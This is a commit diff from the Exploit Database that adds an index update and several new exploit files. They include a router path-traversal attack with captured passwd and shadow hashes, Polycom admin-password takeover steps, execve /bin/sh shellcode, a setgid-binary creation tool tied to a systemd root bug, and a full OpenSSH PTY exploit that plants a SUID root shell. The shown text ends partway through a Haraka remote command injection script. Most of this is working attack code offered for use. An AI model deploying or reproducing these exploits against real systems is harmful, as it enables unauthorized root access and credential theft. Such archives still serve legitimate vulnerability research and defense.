DB: 2017-01-27

17 new exploits

Google Android - 'pm_qos' KASLR Bypass
macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption
macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free
macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free
Systemd 228 - Privilege Escalation (PoC)
OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation
Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service
Haraka < 2.8.9 - Remote Command Execution

Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)

Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (1)
Drupal 7.0 < 7.31 - SQL Injection (1)

Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (2)
Drupal 7.0 < 7.31 - SQL Injection (2)
Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload
KB Affiliate Referral Script 1.0 - Authentication Bypass
KB Login Authentication Script 1.1 - Authentication Bypass
KB Messages PHP Script 1.0 - Authentication Bypass
Web Based TimeSheet Script - Authentication Bypass
TM RG4332 Wireless Router - Arbitrary File Disclosure
PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting
Polycom VVX Web Interface - Change Admin Password
This commit is contained in:
Offensive Security 2017-01-27 05:01:17 +00:00
parent 45360ed27c
commit d0b74905e8
20 changed files with 1337 additions and 2 deletions

View file

@ -5344,6 +5344,10 @@ id,file,description,date,author,platform,type,port
41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0
41145,platforms/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,multiple,dos,0
41161,platforms/android/dos/41161.txt,"Google Android - 'pm_qos' KASLR Bypass",2017-01-26,"Google Security Research",android,dos,0
41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8765,6 +8769,8 @@ id,file,description,date,author,platform,type,port
41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15235,6 +15241,8 @@ id,file,description,date,author,platform,type,port
41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
41160,platforms/windows/remote/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,windows,remote,0
41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15843,6 +15851,7 @@ id,file,description,date,author,platform,type,port
41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -33864,12 +33873,12 @@ id,file,description,date,author,platform,type,port
34974,platforms/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0
34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0
34984,platforms/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (1)",2014-10-16,fyukyuk,php,webapps,0
34984,platforms/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps,0
34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0
34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0
34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps,0
34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0
34992,platforms/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (2)",2014-10-17,"Claudio Viviani",php,webapps,0
34992,platforms/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (2)",2014-10-17,"Claudio Viviani",php,webapps,0
34993,platforms/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0
35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0
35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
@ -37091,3 +37100,11 @@ id,file,description,date,author,platform,type,port
41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41169,platforms/php/webapps/41169.txt,"Web Based TimeSheet Script - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0

Can't render this file because it is too large.

70
platforms/android/dos/41161.txt Executable file
View file

@ -0,0 +1,70 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=971
The "pm_qos" module exposes an interface to kernel space for specifying QoS dependencies. In order to aid in debugging this interface, the module exposes a "debugfs" interface, available under:
/sys/kernel/debug/pm_qos
This file is world-readable, and allows any user to query the current QOS constraints. The code which prints out each constraint is available under the "pm_qos_debug_show_one" function in the file "kernel/power/qos.c". Here is the code for this function:
static void pm_qos_debug_show_one(struct seq_file *s, struct pm_qos_object *qos)
{
struct plist_node *p;
unsigned long flags;
spin_lock_irqsave(&pm_qos_lock, flags);
seq_printf(s, "%s\n", qos->name);
seq_printf(s, " default value: %d\n", qos->constraints->default_value);
seq_printf(s, " target value: %d\n", qos->constraints->target_value);
seq_printf(s, " requests:\n");
plist_for_each(p, &qos->constraints->list)
seq_printf(s, " %pk(%s:%d): %d\n",
container_of(p, struct pm_qos_request, node),
(container_of(p, struct pm_qos_request, node))->func,
(container_of(p, struct pm_qos_request, node))->line,
p->prio);
spin_unlock_irqrestore(&pm_qos_lock, flags);
}
As seen above, the function prints out the QOS constraint entries (which are static variables stored in the kernel's BSS). To avoid leaking the BSS addresses to unprivileged users, the function uses the format specifier "%pk". Note that the 'k' character in this format specifier is lowercase, instead of the correct specifier - "%pK" (using an uppercase 'K'). As format specifiers are case-sensitive, the "vsnprintf" implementation simply ignores the lowercase 'k' - therefore always printing the pointer above.
For devices with Samsung KNOX v2.6 (e.g., Galaxy S7 and Galaxy S7 Edge), this allows an attacker to bypass KASLR. This is since the BSS and the kernel's code have the same KASLR "slide" value. An attacker can read the QOS constraint addresses from the "sysfs" entry and compare them to the calculated base address of the kernel's BSS in order to find the value of the KASLR slide.
This issue can be addressed by fixing the format specifier to "%pK".
Although the original code for the "pm_qos" is written by Intel, I could only trace back this specific code snippet ("pm_qos_debug_show_one") to Samsung kernels. Therefore, I am assuming that this specific code has been added by Samsung at a certain point. If this is not the case, please let me know so that I can report this issue to the additional parties.
I've statically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource".
The sysfs entries mentioned above are world-readable and have an SELinux context of: "u:object_r:debugfs:s0". According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
allow ipm debugfs : file { ioctl read getattr lock open } ;
allow RIDL debugfs : file read ;
allow secure_storage debugfs : dir { ioctl read getattr search open } ;
allow knox_system_app debugfs : dir { ioctl read getattr search open } ;
allow debuggerd debugfs : file { ioctl read getattr lock open } ;
allow trusteddomain debugfs : file { read getattr } ;
allow bluetooth debugfs : file read ;
allow knox_system_app debugfs : file { ioctl read getattr lock open } ;
allow system_app debugfs : file { ioctl read getattr lock open } ;
allow slogmodem debugfs : file read ;
allow slogd debugfs : file { ioctl read getattr lock open } ;
allow debugfs debugfs : filesystem associate ;
allow domain debugfs : file { write append open } ;
allow mediaserver debugfs : file { ioctl read write create getattr setattr lock append unlink rename open } ;
allow debuggerd debugfs : dir { ioctl read getattr search open } ;
allow domain debugfs : dir { ioctl read getattr search open } ;
allow cmd_services debugfs : file read ;
allow dumpstate debugfs : file { ioctl read write getattr lock append open } ;
allow secure_storage debugfs : file { ioctl read getattr lock open } ;
allow wcnd debugfs : file read ;
allow init debugfs : file getattr ;
allow system_server debugfs : file { ioctl read getattr lock open } ;
allow untrusteddomain debugfs : file execute ;
allow shell debugfs : file { ioctl read getattr lock open } ;
allow surfaceflinger debugfs : file { ioctl read getattr lock open } ;
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41161.zip

View file

@ -0,0 +1,58 @@
# Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read
# Date: 27/01/2017
# Exploit Author: Saeid Atabaki
# Version: RG4332_V2.7.0
# Tested on: RG4332 with mini_http 1.19
= 1 =============================================================
GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
= 2 =============================================================
GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

View file

@ -0,0 +1,22 @@
# Exploit Title: Polycom VVX Web Interface - Change Admin Password as User
# Date: January 26, 2017
# Exploit Author: Mike Brown
# Vendor Homepage: http://www.polycom.com/
# Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html
# Version: Polycom vvx 410 UC Software Version: 5.3.1.0436
# CVE : N/A
# This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface.
# The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses
# and account information.
1. Login with the "User" Account.
2. Navigate to Settings > Change Password.
3. Fill in "Old Password" with the current "User" password.
4. Fill in "New Password" with the new "Admin" account password, and confirm.
5. Using a live HTML editor, inspect the old password field. you will see:
<input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword"
default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password">
6. Change the name field to "120"
7. Click "Save"
8. An error will be shown on screen but you can now log into the Admin account with the new password.

View file

@ -0,0 +1,47 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/01/execvestack1434.html
global _start
section .text
_start:
; zeros RAX, RDX and RSI with only 4 bytes of machine code
xor esi,esi
mul esi
; null terminator for the following string
push rax
; push /bin//sh in reverse
mov rbx,'/bin//sh'
push rbx
; store /bin//sh address in RDI, points at string
push rsp
pop rdi
; Call the Execve syscall
mov al, 59
syscall

160
platforms/linux/local/41171.txt Executable file
View file

@ -0,0 +1,160 @@
Source: http://www.openwall.com/lists/oss-security/2017/01/24/4
This is a heads up for a trivial systemd local root exploit, that
was silently fixed in the upstream git as:
commit 06eeacb6fe029804f296b065b3ce91e796e1cd0e
Author: ....
Date: Fri Jan 29 23:36:08 2016 +0200
basic: fix touch() creating files with 07777 mode
mode_t is unsigned, so MODE_INVALID < 0 can never be true.
This fixes a possible DoS where any user could fill /run by writing to
a world-writable /run/systemd/show-status.
The analysis says that is a "possible DoS", but its a local root
exploit indeed. Mode 07777 also contains the suid bit, so files
created by touch() are world writable suids, root owned. Such
as /var/lib/systemd/timers/stamp-fstrim.timer thats found on a non-nosuid mount.
This is trivially exploited by something like:
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
with minimal changes, so I wont provide a PoC here.
The bug was possibly introduced via:
commit ee735086f8670be1591fa9593e80dd60163a7a2f
Author: ...
Date: Wed Nov 11 22:54:56 2015 +0100
util-lib: use MODE_INVALID as invalid value for mode_t everywhere
So we believe that this mostly affects v228 of systemd, but its recommended
that distributors cross-check their systemd versions for vulnerable
touch_*() functions. We requested
a CVE for this issue from MITRE by ourselfs: CVE-2016-10156
We would like to see that systemd upstream retrieves CVE's themself
for their own bugs, even if its believed that its just a local DoS.
This would make distributors life much easier when we read the git logs
to spot potential issues. The systemd git log is really huge, with
lots of commits each week ("new services as a service").
Sebastian
// Source: http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* This tool allows to create a setgid binary in appropriate directory
* to escalate to the group of this directory.
*
* Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c
*
* Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args]
*
* Example:
*
* # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
* # ls -al ./escalate
* # ./escalate /bin/sh
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
*
* See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/wait.h>
int main(int argc, char **argv) {
// No slashes allowed, everything else is OK.
char suidExecMinimalElf[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0,
0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
};
int destFd=open(argv[1], O_RDWR|O_CREAT, 07777);
if(destFd<0) {
fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno));
return(1);
}
char *suidWriteNext=suidExecMinimalElf;
char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
while(suidWriteNext!=suidWriteEnd) {
char *suidWriteTestPos=suidWriteNext;
while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file wihh
// null-bytes for us.
lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
suidWriteNext=suidWriteTestPos;
while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
int result=fork();
if(!result) {
struct rlimit limits;
// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
limits.rlim_max=limits.rlim_cur;
setrlimit(RLIMIT_FSIZE, &limits);
// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader will do that for us.
limits.rlim_cur=1<<22;
limits.rlim_max=limits.rlim_cur;
result=setrlimit(RLIMIT_AS, &limits);
dup2(destFd, 1);
dup2(destFd, 2);
argv[3]=suidWriteNext;
execve(argv[2], argv+3, NULL);
fprintf(stderr, "Exec failed\n");
return(1);
}
waitpid(result, NULL, 0);
suidWriteNext=suidWriteTestPos;
// ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf);
}
fprintf(stderr, "Completed\n");
return(0);
}

83
platforms/linux/local/41173.c Executable file
View file

@ -0,0 +1,83 @@
/*
* not_an_sshnuke.c
*
* Federico Bento
*
* up201407890 () alunos dcc fc up pt
* https://twitter.com/uid1000
*
* OpenSSH 6.8-6.9 local privilege escalation - CVE-2015-6565
*
* Considered mostly to be a "DoS", turns out to be a priv esc vuln.
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565
*
* Shoutz to Jann Horn for the detailed analysis
* And also to all my elite colleagues, specially xSTF :)
*
*
* $ gcc not_an_sshnuke.c -o not_an_sshnuke
* $ ./not_an_sshnuke /dev/pts/3
* [*] Waiting for slave device /dev/pts/3
* [+] Got PTY slave /dev/pts/3
* [+] Making PTY slave the controlling terminal
* [+] SUID shell at /tmp/sh
* $ /tmp/sh --norc --noprofile -p
* # id
* euid=0(root) groups=0(root)
*
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
int main(int argc, char *argv[])
{
char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
int pid, pts = -1;
if(argc != 2) {
fprintf(stderr, "Usage: %s /dev/pts/X\n", argv[0]);
fprintf(stderr, "Where X is next slave device to be created\n");
return 1;
}
if(!access(argv[1], F_OK)) {
fprintf(stderr, "[-] %s device already exists\n", argv[1]);
return 1;
}
pid = fork();
if(pid < 0) {
fprintf(stderr, "[-] fork failed\n");
return 1;
}
if(pid == 0) {
printf("[*] Waiting for slave device %s\n", argv[1]);
/* win the race by opening the PTY slave before sshd's child */
while(pts == -1)
pts = open(argv[1], O_WRONLY);
printf("[+] Got PTY slave %s\n", argv[1]);
printf("[+] Making PTY slave the controlling terminal\n");
dup2(pts, 0); dup2(pts, 1); dup2(pts, 2);
setsid();
ioctl(0, TIOCSCTTY, 1);
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}
else {
wait(NULL);
printf("[+] SUID shell at /tmp/sh\n");
return 0;
}
}

167
platforms/linux/remote/41162.py Executable file
View file

@ -0,0 +1,167 @@
#!/usr/bin/python
# Exploit Title: Harakiri
# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl]
# Date: 26 January 2017
# Category: Remote Code Execution
# Vendor Homepage: https://haraka.github.io/
# Vendor Patch: https://github.com/haraka/Haraka/pull/1606
# Software Link: https://github.com/haraka/Haraka
# Exploit github: http://github.com/outflankbv/Exploits/
# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
# Version: <= Haraka 2.8.8 (with attachment plugin enabled)
# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
# Tested versions: 2.8.8 and 2.7.2
# CVE : CVE-2016-1000282
# Credits to: smfreegard for finding and reporting the vulnerability
# Thanks to: Dexlab.nl for asking me to look at Haraka.
#
# Instructions for testing the exploit below.
# The zip is also saved to disk and can be attached using any mail client.
# As it's processed in a vulnerable server it will run the embedded command
#
# Disclaimer:
# This software has been created purely for the purposes of academic research and
# for the development of effective defensive techniques, and is not intended to be
# used to attack systems except where explicitly authorized. Project maintainers
# are not responsible or liable for misuse of the software. Use responsibly.
#
# This is to be considered a responsible disclosure due to the availability of an effective patch.
Install_and_test_exploit ="""
THIS A INSTALLATION GUILDELINE FOR A VULNERABLE HARAKA INSTANCE FOR TESTING THE EXPLOIT
#Install a clean server (for example on Digital Ocean)
#I picked the smallest Ubuntu 16.04.1 LTS for this guide.
#I needed to enable swap on that installation
fallocate -l 4G /swapfile
chmod 600 /swapfile
mkswap /swapfile
swapon /swapfile
swapon -s
#install nodejs and npm: Note I have no clue what I'm doing here but it works!
apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install -g npm
ln -s /usr/bin/nodejs /usr/bin/node
npm install -g
#Haraka setup
haraka -i /root/haraka
cat << EOF > /root/haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
cat << EOF >> /root/haraka/config/host_list
haraka.test
EOF
# Launch haraka as root
haraka -c /root/haraka/
#### EXPLOIT TIME
./harakiri.py -c "id > /tmp/harakiri" -t root@haraka.test -m <<IP OF TESTMACHINE HERE>>
## now CTRL^C haraka on the server and:
cat /tmp/harakiri
# I'll leave the rest up to you
"""
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.utils import COMMASPACE, formatdate
from email.header import Header
from email.utils import formataddr
from email.mime.text import MIMEText
from datetime import datetime
import zipfile
import StringIO
import argparse
import sys
banner = u"""## ## ### ######## ### ## ## #### ######## ####
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ##
######### ## ## ######## ## ## ##### ## ######## ##
## ## ######### ## ## ######### ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## #### ## ## ####
